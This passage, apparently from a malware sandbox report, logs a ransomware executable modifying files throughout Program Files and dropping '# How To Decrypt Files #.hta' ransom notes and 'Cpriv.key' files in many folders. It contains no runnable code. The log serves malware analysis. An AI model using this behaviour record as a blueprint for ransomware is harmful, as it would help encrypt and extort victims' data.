DB\en-US\sqloledb.rll.mui de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105974.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105526.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215718.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\MSInfo\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\grayStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10219_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00095_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\EMAIL11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Visualizations\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EVRGREEN\EVRGREEN.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\QUAD\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\cpu.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SIGNS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN022.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15272_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BCSEvents.man de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWSHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\WidevineCdm\_platform_specific\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02398_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01634_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152558.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\km\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14755_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\default_thumb.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7EN.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN107.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsColorChart.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PowerPoint.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\Presentation Designs\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\setup.swf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\STUDIO\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\slideshow_glass_frame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\OLTASK.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsFormTemplateRTL.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.MX.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-disable.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\jaccess.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Internet Explorer\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00397_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Bibliography\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21434_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL103.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\NVBELL.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\GIFT.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\cpu.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENES\MSB1ENES.ITS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01770_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR4B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Address.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Services\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01793_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01148_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18246_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15057_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115841.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Genko_2.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RADIAL\RADIAL.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00320_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_right_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\th\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19563_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\VBCN6.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\QUAD\QUAD.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\LEVEL\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14516_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02791_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14997_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\BUTTON.GIF 